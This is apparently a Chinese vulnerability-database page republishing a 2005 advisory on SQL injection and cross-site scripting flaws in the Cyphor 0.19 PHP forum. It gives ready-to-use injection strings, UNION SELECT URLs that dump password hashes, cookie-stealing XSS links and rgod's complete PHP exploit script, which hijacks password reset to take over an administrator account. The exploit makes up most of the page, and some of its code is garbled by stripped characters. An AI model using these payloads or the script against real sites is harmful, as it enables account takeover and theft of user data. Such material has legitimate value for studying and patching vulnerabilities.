Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)
漏洞ID | 1053318 | 漏洞类型 | |
发布时间 | 2005-10-11 | 更新时间 | 2005-10-11 |
CVE编号 | CVE-2005-3236 CVE-2005-3237 |
CNNVD-ID | N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)
------------------------------------------------------------------------
SUMMARY
<http://www.cynox.ch/cyphor/about.php> Cyphor is "a configurable
Webforum, which uses PHP4's session capabilities to authenticate users,
the MySQL database system to store all its data in, and Cascading Style
Sheets (CSS) to configure the "Look and Feel" of the forum. Only
registered users can post messages, registered users are split up into
normal users, moderators and administrators. Moderators and administrators
can delete threads, administrators can change board settings, create new
forums etc".
Multiple security vulnerabilities have been discovered in Cyphor that
allow remote attackers to cause the program to execute arbitrary SQL
statement and include arbitrary HTML and/or JavaScript into pages returned
to users.
DETAILS
Vulnerable Systems:
* Cyphor version 0.19
If PHP's magic quotes have been set to off a remote attacker can trigger
numerous SQL injections:
SQL Injection in 'Forgot Password Interface':
The "Forgot your password?" feature allows you to send yourself a new
administrator password, this by supplying an SQL injecting string into the
information sent to the server:
email: [your_email]
nick: 'or'X'='X
This will trigger an email of the sorts of:
You have registered for a Cyphor forum (My Discussions). This is your
confirmation.
Your username is: 'or'X'='X
Your password is: mixa-13b
Now you can go to administration panel, create/edit/delete
forums/group/users, you can insert evil javascript code in terms of usage
or welcome message.
SQL Injection newmsg.php:
To see table_prefix (usually "cyphor_") use the following request:
http://[target]/cyphor/newmsg.php?fid='
You can cause the server to return the administrator password hash by
using the following URL:
http://[target]/[path]/newmsg.php?fid='' UNION SELECT nick, password,
null, null FROM [table_prefix]users /*
(it is encrypted by crypt() function with username as key, one way ... but
can try to brute force it)
Cross Site Scripting in newmsg.php:
The following URL will trigger an cross site scripting attack against
users viewing the below link:
http://[target]/[path]/newmsg.php?fid='' UNION SELECT null, "<
script>alert(document.cookie)< /script>", null, null/*
Cross Site Scripting in footer.php:
The following URL will trigger an cross site scripting attack against
users viewing the below link:
http://[target]/[path]/include/footer.php?t_login=<
script>alert(document.cookie)< /script>
Exploit:
< ?php
# --- cyphor019_xpl.php 7.36 08/10/2005 #
# #
# Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# send yourself any user / admin password right now! #
# #
# Sun Tzu: "There are five ways of attacking with fire. The first is to
burn #
# soldiers in their camp; the second is to burn stores; the third is to
burn #
# baggage trains; the fourth is to burn arsenals and magazines; the fifth
is #
# to hurl dropping fire amongst the opponent." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'< html>< head>< title>Cyphor 0.19 SQL Injection/board takeover <
/title>< meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> < style
type="text/css"> body { background-color:#111111;
SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important}
option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1
{font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size:
0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} *
{font-style:
normal !important} *{text-decoration: none !important}
a:link,a:active,a:visited
{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration:
underline;
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,
sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,
sans-serif;
font-weight:bold; font-style: italic;}-->< /style>< /head>< body>< p
class="Stile6">
Cyphor 0.19 (possibly prior versions) SQL injection / board takeover <
/p>< p
class="Stile6"> a script by rgod at < a href="http://rgod.altervista.org"
target="_blank"> http://rgod.altervista.org< /a>< /p> < table
width="84%">< tr> < td
width="43%">< form name="form1" method="post"
action="'.$SERVER[PHP_SELF].'?path=
value&host=value&port=value&username=value&proxy=value&your_email=value">
< p>
< input type="text" name="host">< span class="Stile5"> hostname (ex:
www.sitename.
com)< /span>< /p>< p>< input type="text" name="path">< span
class="Stile5"> path (ex:
/cyphor/ or /forum/ or just /)< /span>< /p>< p>< input type="text"
name="port">< span
class="Stile5"> specify a port other than 80 (default value)< /span>< /p><
p>< input
type="text" name="username">< span class="Stile5">user whom you want the
password
,admin? ;) < /span> < /p> < p> < input type="text" name="your_email"><
span
class="Stile5"> email where the password will be sent< /span> < /p> < p> <
input
type="text" name="proxy">< span class="Stile5"> send exploit through an
HTTP prox
y (ip:port) < /span>< /p>< p>< input type="submit" name="Submit"
value="go!">< /p>
< /form>< /td>< /tr>< /table>< /body>< /html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '< table border="0">< tr>';
while ($ii < = strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "< td> < /td>";
for ($li=0; $li< =15; $li++)
{ echo "< td>".$headeri[$li+$ki]."< /td>";
}
$ki=$ki+16;
echo "< /tr>< tr>";
}
if (strlen($datai)==1) {echo "< td>0".$datai."< /td>";} else
{echo "< td>".$datai."< /td> ";}
$ii++;
$ji++;
}
for ($li=1; $li< =(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "< td>  < /td>";
}
for ($li=$ci*16; $li< =strlen($headeri); $li++)
{ echo "< td>".$headeri[$li]."< /td>";
}
echo "< /tr>< /table>";
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacket($packet)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host).'...';
die;
}}
else
{
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...< br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
define('EMAIL_PREG',
'#^[a-z0-9&-_.+]+?@[w-]+.([w-.]+.)?[w]+$#');
define('USER_PREG', '#^[A-Za-z0-9_-]+$#');
if (($path< >'') and ($host< >'') and ($your_email< >'') and ($username<
>''))
{
if (!preg_match(EMAIL_PREG, $your_email)) {echo '< br>Need a valid
email...'; die;}
if (!preg_match(USER_PREG, $username)) {echo '< br>Need a valid
username...'; die;}
if ($port=='') {$port=80;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
#STEP 1 -> retrieve the table prefix...
$packet="GET ".$p."show.php?fid=' HTTP/1.0 rn";
$packet.="User-Agent: GetRight/4.5xxrn";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*rn";
$packet.="Accept-Encoding: text/plainrn";
$packet.="Host: ".$host."rn";
$packet.="Connection: Closernrn";
show($packet);
sendpacket($packet);
$temp=explode("SELECT * FROM ",$html);
$temp2=explode("forums WHERE",$temp[1]);
$table_prefix=trim($temp2[0]);
echo '< br> Table prefix ->'.htmlentities($table_prefix);
if ($table_prefix=='') {echo 'Exploit failed...'; die;}
#STEP 2 -> send yourself a new password...
$sql="') UNION SELECT * FROM ".$table_prefix."users WHERE
nick='".$username."'/*";
$sql=urlencode($sql);
$data="email=".urlencode($your_email)."&nick=".$sql."&submit=Submit";
$packet="POST ".$p."lostpwd.php HTTP/1.1rn";
$packet.="Referer: http://".$host.":".$port.$path."lostpwd.phprn";
$packet.="Accept-Language: itrn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Accept-Encoding: gzip, deflatern";
$packet.="User-Agent: Internet Ninja x.0rn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Keep-Alivern";
$packet.="Cache-Control: no-cachernrn";
$packet.=$data;
show($packet);
sendpacket($packet);
if (eregi("New password sent.",$html)) {echo '< br>Exploit
successful...check your email box...';}
else {echo '< br>Exploit failed...';}
}
else
{ echo 'Fill in requested fields, optionally specify a proxy...'; }
?>
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]>
rgod.
The original article can be found at:
<http://rgod.altervista.org/cyphor019.html>
http://rgod.altervista.org/cyphor019.html
相关推荐: RemotelyAnywhere Default.HTML Logout Message Injection Weakness
RemotelyAnywhere Default.HTML Logout Message Injection Weakness 漏洞ID 1099158 漏洞类型 Design Error 发布时间 2003-12-11 更新时间 2003-12-11 CVE…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666